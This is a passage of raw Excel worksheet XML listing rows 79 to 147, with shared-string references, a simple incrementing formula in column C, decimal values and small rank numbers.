        <f t="shared" si="1"/>
        <v>9527922</v>
      </c>
      <c r="D79" t="s">
        <v>158</v>
      </c>
      <c r="E79">
        <v>31.095014572143551</v>
      </c>
      <c r="F79">
        <v>1</v>
      </c>
    </row>
    <row r="80" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A80" t="s">
        <v>156</v>
      </c>
      <c r="B80" t="s">
        <v>159</v>
      </c>
      <c r="C80">
        <f t="shared" si="1"/>
        <v>9529175</v>
      </c>
      <c r="D80" t="s">
        <v>160</v>
      </c>
      <c r="E80">
        <v>5.7560381889343262</v>
      </c>
      <c r="F80">
        <v>2</v>
      </c>
    </row>
    <row r="81" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A81" t="s">
        <v>161</v>
      </c>
      <c r="B81" t="s">
        <v>162</v>
      </c>
      <c r="C81">
        <f t="shared" si="1"/>
        <v>9530428</v>
      </c>
      <c r="D81" t="s">
        <v>163</v>
      </c>
      <c r="E81">
        <v>22.132236480712891</v>
      </c>
      <c r="F81">
        <v>1</v>
      </c>
    </row>
    <row r="82" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A82" t="s">
        <v>161</v>
      </c>
      <c r="B82" t="s">
        <v>162</v>
      </c>
      <c r="C82">
        <f t="shared" si="1"/>
        <v>9531681</v>
      </c>
      <c r="D82" t="s">
        <v>164</v>
      </c>
      <c r="E82">
        <v>6.1039681434631348</v>
      </c>
      <c r="F82">
        <v>2</v>
      </c>
    </row>
    <row r="83" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A83" t="s">
        <v>165</v>
      </c>
      <c r="B83" t="s">
        <v>166</v>
      </c>
      <c r="C83">
        <f t="shared" si="1"/>
        <v>9532934</v>
      </c>
      <c r="D83" t="s">
        <v>167</v>
      </c>
      <c r="E83">
        <v>26.645099639892582</v>
      </c>
      <c r="F83">
        <v>1</v>
      </c>
    </row>
    <row r="84" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A84" t="s">
        <v>165</v>
      </c>
      <c r="B84" t="s">
        <v>166</v>
      </c>
      <c r="C84">
        <f t="shared" si="1"/>
        <v>9534187</v>
      </c>
      <c r="D84" t="s">
        <v>168</v>
      </c>
      <c r="E84">
        <v>7.4132585525512704</v>
      </c>
      <c r="F84">
        <v>2</v>
      </c>
    </row>
    <row r="85" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A85" t="s">
        <v>169</v>
      </c>
      <c r="B85" t="s">
        <v>170</v>
      </c>
      <c r="C85">
        <f t="shared" si="1"/>
        <v>9535440</v>
      </c>
      <c r="D85" t="s">
        <v>171</v>
      </c>
      <c r="E85">
        <v>27.06065559387207</v>
      </c>
      <c r="F85">
        <v>1</v>
      </c>
    </row>
    <row r="86" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A86" t="s">
        <v>169</v>
      </c>
      <c r="B86" t="s">
        <v>172</v>
      </c>
      <c r="C86">
        <f t="shared" si="1"/>
        <v>9536693</v>
      </c>
      <c r="D86" t="s">
        <v>173</v>
      </c>
      <c r="E86">
        <v>4.8435730934143066</v>
      </c>
      <c r="F86">
        <v>2</v>
      </c>
    </row>
    <row r="87" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A87" t="s">
        <v>174</v>
      </c>
      <c r="B87" t="s">
        <v>175</v>
      </c>
      <c r="C87">
        <f t="shared" si="1"/>
        <v>9537946</v>
      </c>
      <c r="D87" t="s">
        <v>176</v>
      </c>
      <c r="E87">
        <v>20.284078598022461</v>
      </c>
      <c r="F87">
        <v>1</v>
      </c>
    </row>
    <row r="88" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A88" t="s">
        <v>174</v>
      </c>
      <c r="B88" t="s">
        <v>175</v>
      </c>
      <c r="C88">
        <f t="shared" si="1"/>
        <v>9539199</v>
      </c>
      <c r="D88" t="s">
        <v>177</v>
      </c>
      <c r="E88">
        <v>2.500745296478271</v>
      </c>
      <c r="F88">
        <v>2</v>
      </c>
    </row>
    <row r="89" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A89" t="s">
        <v>178</v>
      </c>
      <c r="B89" t="s">
        <v>179</v>
      </c>
      <c r="C89">
        <f t="shared" si="1"/>
        <v>9540452</v>
      </c>
      <c r="D89" t="s">
        <v>180</v>
      </c>
      <c r="E89">
        <v>22.307844161987301</v>
      </c>
      <c r="F89">
        <v>1</v>
      </c>
    </row>
    <row r="90" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A90" t="s">
        <v>178</v>
      </c>
      <c r="B90" t="s">
        <v>179</v>
      </c>
      <c r="C90">
        <f t="shared" si="1"/>
        <v>9541705</v>
      </c>
      <c r="D90" t="s">
        <v>181</v>
      </c>
      <c r="E90">
        <v>3.124616384506226</v>
      </c>
      <c r="F90">
        <v>2</v>
      </c>
    </row>
    <row r="91" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A91" t="s">
        <v>182</v>
      </c>
      <c r="B91" t="s">
        <v>183</v>
      </c>
      <c r="C91">
        <f t="shared" si="1"/>
        <v>9542958</v>
      </c>
      <c r="D91" t="s">
        <v>184</v>
      </c>
      <c r="E91">
        <v>21.409980773925781</v>
      </c>
      <c r="F91">
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A92" t="s">
        <v>182</v>
      </c>
      <c r="B92" t="s">
        <v>183</v>
      </c>
      <c r="C92">
        <f t="shared" si="1"/>
        <v>9544211</v>
      </c>
      <c r="D92" t="s">
        <v>185</v>
      </c>
      <c r="E92">
        <v>8.3166666030883789</v>
      </c>
      <c r="F92">
        <v>2</v>
      </c>
    </row>
    <row r="93" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A93" t="s">
        <v>186</v>
      </c>
      <c r="B93" t="s">
        <v>187</v>
      </c>
      <c r="C93">
        <f t="shared" si="1"/>
        <v>9545464</v>
      </c>
      <c r="D93" t="s">
        <v>188</v>
      </c>
      <c r="E93">
        <v>30.47859001159668</v>
      </c>
      <c r="F93">
        <v>1</v>
      </c>
    </row>
    <row r="94" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A94" t="s">
        <v>186</v>
      </c>
      <c r="B94" t="s">
        <v>187</v>
      </c>
      <c r="C94">
        <f t="shared" si="1"/>
        <v>9546717</v>
      </c>
      <c r="D94" t="s">
        <v>189</v>
      </c>
      <c r="E94">
        <v>8.1439685821533203</v>
      </c>
      <c r="F94">
        <v>2</v>
      </c>
    </row>
    <row r="95" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A95" t="s">
        <v>190</v>
      </c>
      <c r="B95" t="s">
        <v>191</v>
      </c>
      <c r="C95">
        <f t="shared" si="1"/>
        <v>9547970</v>
      </c>
      <c r="D95" t="s">
        <v>192</v>
      </c>
      <c r="E95">
        <v>25.14893913269043</v>
      </c>
      <c r="F95">
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A96" t="s">
        <v>190</v>
      </c>
      <c r="B96" t="s">
        <v>191</v>
      </c>
      <c r="C96">
        <f t="shared" si="1"/>
        <v>9549223</v>
      </c>
      <c r="D96" t="s">
        <v>193</v>
      </c>
      <c r="E96">
        <v>17.31858062744141</v>
      </c>
      <c r="F96">
        <v>2</v>
      </c>
    </row>
    <row r="97" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A97" t="s">
        <v>194</v>
      </c>
      <c r="B97" t="s">
        <v>195</v>
      </c>
      <c r="C97">
        <f t="shared" si="1"/>
        <v>9550476</v>
      </c>
      <c r="D97" t="s">
        <v>196</v>
      </c>
      <c r="E97">
        <v>23.573835372924801</v>
      </c>
      <c r="F97">
        <v>1</v>
      </c>
    </row>
    <row r="98" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A98" t="s">
        <v>194</v>
      </c>
      <c r="B98" t="s">
        <v>197</v>
      </c>
      <c r="C98">
        <f t="shared" si="1"/>
        <v>9551729</v>
      </c>
      <c r="D98" t="s">
        <v>198</v>
      </c>
      <c r="E98">
        <v>22.793361663818359</v>
      </c>
      <c r="F98">
        <v>2</v>
      </c>
    </row>
    <row r="99" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A99" t="s">
        <v>194</v>
      </c>
      <c r="B99" t="s">
        <v>197</v>
      </c>
      <c r="C99">
        <f t="shared" si="1"/>
        <v>9552982</v>
      </c>
      <c r="D99" t="s">
        <v>199</v>
      </c>
      <c r="E99">
        <v>0.95590311288833618</v>
      </c>
      <c r="F99">
        <v>3</v>
      </c>
    </row>
    <row r="100" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A100" t="s">
        <v>200</v>
      </c>
      <c r="B100" t="s">
        <v>201</v>
      </c>
      <c r="C100">
        <f t="shared" si="1"/>
        <v>9554235</v>
      </c>
      <c r="D100" t="s">
        <v>202</v>
      </c>
      <c r="E100">
        <v>28.072385787963871</v>
      </c>
      <c r="F100">
        <v>1</v>
      </c>
    </row>
    <row r="101" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A101" t="s">
        <v>200</v>
      </c>
      <c r="B101" t="s">
        <v>201</v>
      </c>
      <c r="C101">
        <f t="shared" si="1"/>
        <v>9555488</v>
      </c>
      <c r="D101" t="s">
        <v>203</v>
      </c>
      <c r="E101">
        <v>14.65684986114502</v>
      </c>
      <c r="F101">
        <v>2</v>
      </c>
    </row>
    <row r="102" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A102" t="s">
        <v>204</v>
      </c>
      <c r="B102" t="s">
        <v>205</v>
      </c>
      <c r="C102">
        <f t="shared" si="1"/>
        <v>9556741</v>
      </c>
      <c r="D102" t="s">
        <v>206</v>
      </c>
      <c r="E102">
        <v>22.513528823852539</v>
      </c>
      <c r="F102">
        <v>1</v>
      </c>
    </row>
    <row r="103" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A103" t="s">
        <v>204</v>
      </c>
      <c r="B103" t="s">
        <v>205</v>
      </c>
      <c r="C103">
        <f t="shared" si="1"/>
        <v>9557994</v>
      </c>
      <c r="D103" t="s">
        <v>207</v>
      </c>
      <c r="E103">
        <v>13.36709403991699</v>
      </c>
      <c r="F103">
        <v>2</v>
      </c>
    </row>
    <row r="104" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A104" t="s">
        <v>208</v>
      </c>
      <c r="B104" t="s">
        <v>209</v>
      </c>
      <c r="C104">
        <f t="shared" si="1"/>
        <v>9559247</v>
      </c>
      <c r="D104" t="s">
        <v>210</v>
      </c>
      <c r="E104">
        <v>21.33121490478516</v>
      </c>
      <c r="F104">
        <v>1</v>
      </c>
    </row>
    <row r="105" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A105" t="s">
        <v>208</v>
      </c>
      <c r="B105" t="s">
        <v>209</v>
      </c>
      <c r="C105">
        <f t="shared" si="1"/>
        <v>9560500</v>
      </c>
      <c r="D105" t="s">
        <v>211</v>
      </c>
      <c r="E105">
        <v>11.56246948242188</v>
      </c>
      <c r="F105">
        <v>2</v>
      </c>
    </row>
    <row r="106" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A106" t="s">
        <v>212</v>
      </c>
      <c r="B106" t="s">
        <v>213</v>
      </c>
      <c r="C106">
        <f t="shared" si="1"/>
        <v>9561753</v>
      </c>
      <c r="D106" t="s">
        <v>214</v>
      </c>
      <c r="E106">
        <v>34.813583374023438</v>
      </c>
      <c r="F106">
        <v>1</v>
      </c>
    </row>
    <row r="107" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A107" t="s">
        <v>212</v>
      </c>
      <c r="B107" t="s">
        <v>213</v>
      </c>
      <c r="C107">
        <f t="shared" si="1"/>
        <v>9563006</v>
      </c>
      <c r="D107" t="s">
        <v>215</v>
      </c>
      <c r="E107">
        <v>14.540567398071291</v>
      </c>
      <c r="F107">
        <v>2</v>
      </c>
    </row>
    <row r="108" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A108" t="s">
        <v>216</v>
      </c>
      <c r="B108" t="s">
        <v>217</v>
      </c>
      <c r="C108">
        <f t="shared" si="1"/>
        <v>9564259</v>
      </c>
      <c r="D108" t="s">
        <v>218</v>
      </c>
      <c r="E108">
        <v>26.730096817016602</v>
      </c>
      <c r="F108">
        <v>1</v>
      </c>
    </row>
    <row r="109" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A109" t="s">
        <v>216</v>
      </c>
      <c r="B109" t="s">
        <v>217</v>
      </c>
      <c r="C109">
        <f t="shared" si="1"/>
        <v>9565512</v>
      </c>
      <c r="D109" t="s">
        <v>219</v>
      </c>
      <c r="E109">
        <v>12.18480014801025</v>
      </c>
      <c r="F109">
        <v>2</v>
      </c>
    </row>
    <row r="110" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A110" t="s">
        <v>220</v>
      </c>
      <c r="B110" t="s">
        <v>221</v>
      </c>
      <c r="C110">
        <f t="shared" si="1"/>
        <v>9566765</v>
      </c>
      <c r="D110" t="s">
        <v>222</v>
      </c>
      <c r="E110">
        <v>36.369266510009773</v>
      </c>
      <c r="F110">
        <v>1</v>
      </c>
    </row>
    <row r="111" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A111" t="s">
        <v>220</v>
      </c>
      <c r="B111" t="s">
        <v>221</v>
      </c>
      <c r="C111">
        <f t="shared" si="1"/>
        <v>9568018</v>
      </c>
      <c r="D111" t="s">
        <v>223</v>
      </c>
      <c r="E111">
        <v>12.03790950775146</v>
      </c>
      <c r="F111">
        <v>2</v>
      </c>
    </row>
    <row r="112" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A112" t="s">
        <v>224</v>
      </c>
      <c r="B112" t="s">
        <v>225</v>
      </c>
      <c r="C112">
        <f t="shared" si="1"/>
        <v>9569271</v>
      </c>
      <c r="D112" t="s">
        <v>226</v>
      </c>
      <c r="E112">
        <v>32.646106719970703</v>
      </c>
      <c r="F112">
        <v>1</v>
      </c>
    </row>
    <row r="113" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A113" t="s">
        <v>224</v>
      </c>
      <c r="B113" t="s">
        <v>225</v>
      </c>
      <c r="C113">
        <f t="shared" si="1"/>
        <v>9570524</v>
      </c>
      <c r="D113" t="s">
        <v>227</v>
      </c>
      <c r="E113">
        <v>11.611123085021971</v>
      </c>
      <c r="F113">
        <v>2</v>
      </c>
    </row>
    <row r="114" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A114" t="s">
        <v>228</v>
      </c>
      <c r="B114" t="s">
        <v>229</v>
      </c>
      <c r="C114">
        <f t="shared" si="1"/>
        <v>9571777</v>
      </c>
      <c r="D114" t="s">
        <v>230</v>
      </c>
      <c r="E114">
        <v>21.042621612548832</v>
      </c>
      <c r="F114">
        <v>1</v>
      </c>
    </row>
    <row r="115" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A115" t="s">
        <v>228</v>
      </c>
      <c r="B115" t="s">
        <v>229</v>
      </c>
      <c r="C115">
        <f t="shared" si="1"/>
        <v>9573030</v>
      </c>
      <c r="D115" t="s">
        <v>231</v>
      </c>
      <c r="E115">
        <v>8.2444503903388977E-2</v>
      </c>
      <c r="F115">
        <v>2</v>
      </c>
    </row>
    <row r="116" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A116" t="s">
        <v>232</v>
      </c>
      <c r="B116" t="s">
        <v>233</v>
      </c>
      <c r="C116">
        <f t="shared" si="1"/>
        <v>9574283</v>
      </c>
      <c r="D116" t="s">
        <v>234</v>
      </c>
      <c r="E116">
        <v>29.13809967041016</v>
      </c>
      <c r="F116">
        <v>1</v>
      </c>
    </row>
    <row r="117" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A117" t="s">
        <v>232</v>
      </c>
      <c r="B117" t="s">
        <v>233</v>
      </c>
      <c r="C117">
        <f t="shared" si="1"/>
        <v>9575536</v>
      </c>
      <c r="D117" t="s">
        <v>235</v>
      </c>
      <c r="E117">
        <v>14.05862426757812</v>
      </c>
      <c r="F117">
        <v>2</v>
      </c>
    </row>
    <row r="118" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A118" t="s">
        <v>236</v>
      </c>
      <c r="B118" t="s">
        <v>237</v>
      </c>
      <c r="C118">
        <f t="shared" si="1"/>
        <v>9576789</v>
      </c>
      <c r="D118" t="s">
        <v>238</v>
      </c>
      <c r="E118">
        <v>22.848001480102539</v>
      </c>
      <c r="F118">
        <v>1</v>
      </c>
    </row>
    <row r="119" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A119" t="s">
        <v>236</v>
      </c>
      <c r="B119" t="s">
        <v>237</v>
      </c>
      <c r="C119">
        <f t="shared" si="1"/>
        <v>9578042</v>
      </c>
      <c r="D119" t="s">
        <v>239</v>
      </c>
      <c r="E119">
        <v>12.9189453125</v>
      </c>
      <c r="F119">
        <v>2</v>
      </c>
    </row>
    <row r="120" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A120" t="s">
        <v>240</v>
      </c>
      <c r="B120" t="s">
        <v>241</v>
      </c>
      <c r="C120">
        <f t="shared" si="1"/>
        <v>9579295</v>
      </c>
      <c r="D120" t="s">
        <v>242</v>
      </c>
      <c r="E120">
        <v>33.328418731689453</v>
      </c>
      <c r="F120">
        <v>1</v>
      </c>
    </row>
    <row r="121" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A121" t="s">
        <v>240</v>
      </c>
      <c r="B121" t="s">
        <v>241</v>
      </c>
      <c r="C121">
        <f t="shared" si="1"/>
        <v>9580548</v>
      </c>
      <c r="D121" t="s">
        <v>243</v>
      </c>
      <c r="E121">
        <v>0.27378872036933899</v>
      </c>
      <c r="F121">
        <v>2</v>
      </c>
    </row>
    <row r="122" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A122" t="s">
        <v>244</v>
      </c>
      <c r="B122" t="s">
        <v>245</v>
      </c>
      <c r="C122">
        <f t="shared" si="1"/>
        <v>9581801</v>
      </c>
      <c r="D122" t="s">
        <v>246</v>
      </c>
      <c r="E122">
        <v>21.114839553833011</v>
      </c>
      <c r="F122">
        <v>1</v>
      </c>
    </row>
    <row r="123" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A123" t="s">
        <v>244</v>
      </c>
      <c r="B123" t="s">
        <v>245</v>
      </c>
      <c r="C123">
        <f t="shared" si="1"/>
        <v>9583054</v>
      </c>
      <c r="D123" t="s">
        <v>247</v>
      </c>
      <c r="E123">
        <v>8.7845211029052734</v>
      </c>
      <c r="F123">
        <v>2</v>
      </c>
    </row>
    <row r="124" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A124" t="s">
        <v>248</v>
      </c>
      <c r="B124" t="s">
        <v>249</v>
      </c>
      <c r="C124">
        <f t="shared" si="1"/>
        <v>9584307</v>
      </c>
      <c r="D124" t="s">
        <v>250</v>
      </c>
      <c r="E124">
        <v>23.747720718383789</v>
      </c>
      <c r="F124">
        <v>1</v>
      </c>
    </row>
    <row r="125" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A125" t="s">
        <v>248</v>
      </c>
      <c r="B125" t="s">
        <v>249</v>
      </c>
      <c r="C125">
        <f t="shared" si="1"/>
        <v>9585560</v>
      </c>
      <c r="D125" t="s">
        <v>251</v>
      </c>
      <c r="E125">
        <v>3.1311942730098958E-3</v>
      </c>
      <c r="F125">
        <v>2</v>
      </c>
    </row>
    <row r="126" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A126" t="s">
        <v>252</v>
      </c>
      <c r="B126" t="s">
        <v>253</v>
      </c>
      <c r="C126">
        <f t="shared" si="1"/>
        <v>9586813</v>
      </c>
      <c r="D126" t="s">
        <v>254</v>
      </c>
      <c r="E126">
        <v>23.450263977050781</v>
      </c>
      <c r="F126">
        <v>1</v>
      </c>
    </row>
    <row r="127" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A127" t="s">
        <v>252</v>
      </c>
      <c r="B127" t="s">
        <v>253</v>
      </c>
      <c r="C127">
        <f t="shared" si="1"/>
        <v>9588066</v>
      </c>
      <c r="D127" t="s">
        <v>255</v>
      </c>
      <c r="E127">
        <v>3.8876850157976151E-3</v>
      </c>
      <c r="F127">
        <v>2</v>
      </c>
    </row>
    <row r="128" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A128" t="s">
        <v>256</v>
      </c>
      <c r="B128" t="s">
        <v>257</v>
      </c>
      <c r="C128">
        <f t="shared" si="1"/>
        <v>9589319</v>
      </c>
      <c r="D128" t="s">
        <v>258</v>
      </c>
      <c r="E128">
        <v>23.729412078857418</v>
      </c>
      <c r="F128">
        <v>1</v>
      </c>
    </row>
    <row r="129" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A129" t="s">
        <v>256</v>
      </c>
      <c r="B129" t="s">
        <v>257</v>
      </c>
      <c r="C129">
        <f t="shared" si="1"/>
        <v>9590572</v>
      </c>
      <c r="D129" t="s">
        <v>259</v>
      </c>
      <c r="E129">
        <v>8.5585908889770508</v>
      </c>
      <c r="F129">
        <v>2</v>
      </c>
    </row>
    <row r="130" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A130" t="s">
        <v>260</v>
      </c>
      <c r="B130" t="s">
        <v>261</v>
      </c>
      <c r="C130">
        <f t="shared" si="1"/>
        <v>9591825</v>
      </c>
      <c r="D130" t="s">
        <v>262</v>
      </c>
      <c r="E130">
        <v>26.649978637695309</v>
      </c>
      <c r="F130">
        <v>1</v>
      </c>
    </row>
    <row r="131" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A131" t="s">
        <v>260</v>
      </c>
      <c r="B131" t="s">
        <v>261</v>
      </c>
      <c r="C131">
        <f t="shared" si="1"/>
        <v>9593078</v>
      </c>
      <c r="D131" t="s">
        <v>263</v>
      </c>
      <c r="E131">
        <v>12.845414161682131</v>
      </c>
      <c r="F131">
        <v>2</v>
      </c>
    </row>
    <row r="132" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A132" t="s">
        <v>264</v>
      </c>
      <c r="B132" t="s">
        <v>265</v>
      </c>
      <c r="C132">
        <f t="shared" si="1"/>
        <v>9594331</v>
      </c>
      <c r="D132" t="s">
        <v>266</v>
      </c>
      <c r="E132">
        <v>29.17239952087402</v>
      </c>
      <c r="F132">
        <v>1</v>
      </c>
    </row>
    <row r="133" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A133" t="s">
        <v>264</v>
      </c>
      <c r="B133" t="s">
        <v>265</v>
      </c>
      <c r="C133">
        <f t="shared" si="1"/>
        <v>9595584</v>
      </c>
      <c r="D133" t="s">
        <v>267</v>
      </c>
      <c r="E133">
        <v>6.9842000007629386</v>
      </c>
      <c r="F133">
        <v>2</v>
      </c>
    </row>
    <row r="134" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A134" t="s">
        <v>268</v>
      </c>
      <c r="B134" t="s">
        <v>269</v>
      </c>
      <c r="C134">
        <f t="shared" si="1"/>
        <v>9596837</v>
      </c>
      <c r="D134" t="s">
        <v>270</v>
      </c>
      <c r="E134">
        <v>32.70556640625</v>
      </c>
      <c r="F134">
        <v>1</v>
      </c>
    </row>
    <row r="135" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A135" t="s">
        <v>268</v>
      </c>
      <c r="B135" t="s">
        <v>269</v>
      </c>
      <c r="C135">
        <f t="shared" si="1"/>
        <v>9598090</v>
      </c>
      <c r="D135" t="s">
        <v>271</v>
      </c>
      <c r="E135">
        <v>10.101352691650391</v>
      </c>
      <c r="F135">
        <v>2</v>
      </c>
    </row>
    <row r="136" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A136" t="s">
        <v>272</v>
      </c>
      <c r="B136" t="s">
        <v>273</v>
      </c>
      <c r="C136">
        <f t="shared" si="1"/>
        <v>9599343</v>
      </c>
      <c r="D136" t="s">
        <v>274</v>
      </c>
      <c r="E136">
        <v>36.525646209716797</v>
      </c>
      <c r="F136">
        <v>1</v>
      </c>
    </row>
    <row r="137" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A137" t="s">
        <v>272</v>
      </c>
      <c r="B137" t="s">
        <v>273</v>
      </c>
      <c r="C137">
        <f t="shared" si="1"/>
        <v>9600596</v>
      </c>
      <c r="D137" t="s">
        <v>275</v>
      </c>
      <c r="E137">
        <v>0.51945459842681885</v>
      </c>
      <c r="F137">
        <v>2</v>
      </c>
    </row>
    <row r="138" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A138" t="s">
        <v>276</v>
      </c>
      <c r="B138" t="s">
        <v>277</v>
      </c>
      <c r="C138">
        <f t="shared" ref="C138:C201" si="2">C137+1253</f>
        <v>9601849</v>
      </c>
      <c r="D138" t="s">
        <v>278</v>
      </c>
      <c r="E138">
        <v>29.433200836181641</v>
      </c>
      <c r="F138">
        <v>1</v>
      </c>
    </row>
    <row r="139" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A139" t="s">
        <v>276</v>
      </c>
      <c r="B139" t="s">
        <v>277</v>
      </c>
      <c r="C139">
        <f t="shared" si="2"/>
        <v>9603102</v>
      </c>
      <c r="D139" t="s">
        <v>279</v>
      </c>
      <c r="E139">
        <v>2.57001781463623</v>
      </c>
      <c r="F139">
        <v>2</v>
      </c>
    </row>
    <row r="140" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A140" t="s">
        <v>280</v>
      </c>
      <c r="B140" t="s">
        <v>281</v>
      </c>
      <c r="C140">
        <f t="shared" si="2"/>
        <v>9604355</v>
      </c>
      <c r="D140" t="s">
        <v>282</v>
      </c>
      <c r="E140">
        <v>27.416387557983398</v>
      </c>
      <c r="F140">
        <v>1</v>
      </c>
    </row>
    <row r="141" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A141" t="s">
        <v>280</v>
      </c>
      <c r="B141" t="s">
        <v>281</v>
      </c>
      <c r="C141">
        <f t="shared" si="2"/>
        <v>9605608</v>
      </c>
      <c r="D141" t="s">
        <v>283</v>
      </c>
      <c r="E141">
        <v>5.7187843322753906</v>
      </c>
      <c r="F141">
        <v>2</v>
      </c>
    </row>
    <row r="142" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A142" t="s">
        <v>284</v>
      </c>
      <c r="B142" t="s">
        <v>285</v>
      </c>
      <c r="C142">
        <f t="shared" si="2"/>
        <v>9606861</v>
      </c>
      <c r="D142" t="s">
        <v>286</v>
      </c>
      <c r="E142">
        <v>28.57066535949707</v>
      </c>
      <c r="F142">
        <v>1</v>
      </c>
    </row>
    <row r="143" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A143" t="s">
        <v>284</v>
      </c>
      <c r="B143" t="s">
        <v>285</v>
      </c>
      <c r="C143">
        <f t="shared" si="2"/>
        <v>9608114</v>
      </c>
      <c r="D143" t="s">
        <v>287</v>
      </c>
      <c r="E143">
        <v>11.72747802734375</v>
      </c>
      <c r="F143">
        <v>2</v>
      </c>
    </row>
    <row r="144" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A144" t="s">
        <v>288</v>
      </c>
      <c r="B144" t="s">
        <v>289</v>
      </c>
      <c r="C144">
        <f t="shared" si="2"/>
        <v>9609367</v>
      </c>
      <c r="D144" t="s">
        <v>290</v>
      </c>
      <c r="E144">
        <v>33.120624542236328</v>
      </c>
      <c r="F144">
        <v>1</v>
      </c>
    </row>
    <row r="145" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A145" t="s">
        <v>288</v>
      </c>
      <c r="B145" t="s">
        <v>289</v>
      </c>
      <c r="C145">
        <f t="shared" si="2"/>
        <v>9610620</v>
      </c>
      <c r="D145" t="s">
        <v>291</v>
      </c>
      <c r="E145">
        <v>17.814176559448239</v>
      </c>
      <c r="F145">
        <v>2</v>
      </c>
    </row>
    <row r="146" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A146" t="s">
        <v>288</v>
      </c>
      <c r="B146" t="s">
        <v>289</v>
      </c>
      <c r="C146">
        <f t="shared" si="2"/>
        <v>9611873</v>
      </c>
      <c r="D146" t="s">
        <v>292</v>
      </c>
      <c r="E146">
        <v>3.4659559726715088</v>
      </c>
      <c r="F146">
        <v>3</v>
      </c>
    </row>
    <row r="147" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A147" t="s">
        <v>293</v>
      </c>
      <c r="B147" t="s">
        <v>294</v>
      </c>
      <c r="C147">
